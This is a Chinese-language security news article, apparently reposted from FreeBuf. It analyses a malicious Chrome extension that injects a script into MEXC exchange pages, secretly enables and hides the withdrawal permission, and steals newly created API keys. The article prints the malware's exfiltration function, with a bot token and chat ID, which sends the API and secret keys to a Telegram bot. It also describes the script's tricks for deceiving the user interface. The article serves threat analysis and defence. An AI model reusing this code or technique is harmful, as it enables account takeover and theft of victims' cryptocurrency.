2026-01-14 23:11:37 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 假冒MEXCAPIAutomator的Chrome扩展利用ManifestV3在mexc.com页面注入脚本，自动勾选并隐藏提现权限，把新生成的交易API密钥通过TelegramBot即时回传，威胁者无需密码即可接管账户并提币，攻击全程流量与正常HTTPS无异，用户难以察觉。 综合评分： 82 文章分类： 恶意软件,漏洞分析,威胁情报,WEB安全,数据泄露

cover_image

恶意Chrome扩展窃取钱包登录凭证并实施自动化交易

FreeBuf

2026年1月14日 18:31 上海

一款名为 MEXC API Automator 的恶意 Chrome 扩展正滥用浏览器插件的信任机制，窃取 MEXC 用户的加密货币交易权限。该插件伪装成自动化交易和 API 密钥生成工具，暗中控制新创建的 API 密钥，将普通浏览器会话转变为完整的账户接管通道。

攻击始于 Chrome 应用商店中看似合法的插件页面，该页面承诺为 MEXC 交易所提供”支持交易和提现权限的简易 API 密钥生成”功能。安装后，当受害者打开 MEXC 的 API 管理页面（用户通常在此为机器人和自动化交易创建密钥）时，该扩展便会激活。

Part01

隐蔽的权限获取与资金转移

Socket.dev 研究人员经分析确认该扩展实为恶意软件，并将其与代号 jorjortan142 的威胁行为者关联。研究表明，该代码仅在已登录的 MEXC 会话中运行，这意味着攻击者甚至无需窃取传统密码。

该 API 自动化工具突显了攻击者如何利用 Chrome 应用商店的品牌效应建立信任。不同于窃取密码，该扩展专门针对同时具备交易和提现权限的 MEXC API 密钥。这类密钥通常长期有效，被重复用于机器人和脚本，且不像交互式登录那样受到严密监控。

Part02

数据窃取与隐蔽传输机制

当新生成的密钥出现在成功弹窗中时，扩展会立即抓取密钥，并将其准备传输至攻击者控制的 Telegram 基础设施。核心窃取功能通过以下简单函数实现：

function&nbsp;sendKeysToTelegram(apiKey, secretKey)&nbsp;{&nbsp;&nbsp;const&nbsp;botToken&nbsp;=&nbsp;'7534112291:AAF46jJWWo95XsRWkzcPevHW7XNo6cqKG9I';&nbsp;&nbsp;const&nbsp;chatId &nbsp;=&nbsp;'6526634583';&nbsp;&nbsp;fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {&nbsp;&nbsp;&nbsp; method:&nbsp;'POST',&nbsp;&nbsp;&nbsp; headers: {&nbsp;'Content-Type':&nbsp;'application/json'&nbsp;},&nbsp;&nbsp;&nbsp; body: JSON.stringify({&nbsp;chat_id: chatId,&nbsp;text: `API Key: ${apiKey}\nSecret Key: ${secretKey}` })&nbsp; });}

Part03

界面欺骗与权限操控技术

这款基于 Manifest V3 的 Chrome 扩展会向 URL 模式 ://.mexc.com/user/openapi* 注入内容脚本 script.js。当受害者打开目标页面时，脚本会等待 DOM 加载完成，找到 API 创建表单后，自动勾选所有权限复选框（包括提现权限），无需用户额外操作。

为欺骗受害者，脚本篡改页面样式使提现选项看似禁用，而服务器端实际保持启用状态。具体手段包括：从提现复选框中移除”checked”类、通过注入 CSS 隐藏视觉勾选标记，并使用 MutationObserver 确保即使 MEXC 代码恢复该类也再次移除。受害者误以为仅授权了交易权限，实际提交的表单却包含完整提现权限。

由于该扩展仅在浏览器沙盒内运行，仅读取页面内容并通过常规 HTTPS 发送数据，因此能完美融入正常网络流量。当受害者发现异常交易或资金缺失时，攻击者早已将密钥加载到脚本或工具中，无需触碰用户密码即可清空账户。

参考来源：

Malicious Chrome Extension Steals Wallet Login Credentials and Enables Automated Trading

Malicious Chrome Extension Steals Wallet Login Credentials and Enables Automated Trading

#

推荐阅读

#

电台讨论

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：FreeBuf 《恶意Chrome扩展窃取钱包登录凭证并实施自动化交易》